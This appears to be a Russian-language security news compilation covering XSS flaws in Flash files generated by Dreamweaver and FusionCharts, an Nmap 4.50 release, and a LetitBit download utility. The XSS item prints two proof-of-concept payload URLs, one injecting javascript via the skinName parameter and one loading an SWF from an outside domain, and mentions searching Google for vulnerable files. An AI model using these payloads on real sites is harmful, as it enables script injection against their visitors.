Критические уязвимости существуют в ряде популярных программ вэб-верстки, автоматически генерирующих файлы Shockwave Flash (SWF). Например Adobe Dreamweaver, Adobe Аcrobat Connect (ранее известная как Macromedia Breeze), InfoSoft FusionCharts, Techsmith Camtasia... Пробелы в безопасности программ делают сайты, содержащие созданные ими SWF, уязвимыми для XSS-атак. Составленый определенным образом запрос гугл покажет нам массу уязвимых "флэшек" (за подробностями идем на форум).

Программы вэб-верстки, генерирующие SWF-файлы автоматически, вставляют идентичный уязвимый ActionScript в созданный SWF. Уязвимыми являются практически все программы, имеющие одним из пунктов меню "save as SWF", "export to SWF" и т.п.

Наиболее поздо (в декабре) исправления были сделаны в Аdobe Dreamweaver, потому каснемся его поподробнее (то есть страницы, созданные более ранними версиями программы - уязвимы). Параметр "skinName", поддерживаемый всеми флэш-файлами создаными с помощью фитчи "Insert Flash Video", может быть использован для того, чтобы заставить жертву загрузить произвольный УРЛ (например http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//).

Так же к примеру параметр "dataURL", создаваемый прогой InfoSoft FusionCharts, позволяет инъекцию произвольного HTML-кода в объект "TextArea". Это дает атакующему возможность загрузить SWF с другого домена (например http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E) - исправлено в версии софта от 2 сентября 2007.

Nmap 4.50 - новая версия известного сетевого сканера. После последнего релиза прошло более двух лет. На этот раз в программе появилось более 300 изменений.

 

Самые интересные новшества:
- графическая оболочка Zenmap;
- новая подсистема для удаленного определения операционной системы;
- Nmap Scripting Engine - возможность написания скриптов для автоматизации различных манипуляций с Nmap. В поставке имеется 40 скриптов с примерами. Кроме того, поддерживается возможность написания расширений к Nmap на языках LUA и C;
- улучшена работа системы определения версий для программ обеспечивающих работу сетевых сервисов. В базе содержится 4542 сигнатур для 449 типов сервисов. Например: http (1473), telnet (459), ftp (423), smtp (327), pop3 (188), http-proxy (111), ssh (104), imap (103), irc (46) и nntp (44);
- режим расширенной трассировки маршрута, опция "--traceroute".

 Скачать Nmap 4.50

Вышла новая версия утилиты позволяющей скачивать с серверов LetitBit.net . Я считаю эту программу довольно полезной и расскажу почему. Сейчас очень много на сайтах ссылок именно на это хранилище, скорость на мой взгляд не плохая, но есть одна проблема: Качать летитбит неудобно, из-за BitAccelerator, на который ругается антивирусы. Так вот данная программа поможет вам с этим, теперь можете не качать BitAccelerator, а просто ссылку вставить в окно этой программы, и в окне ниже вылезет уже прямая ссылка на файл!!! Так что дерзайте...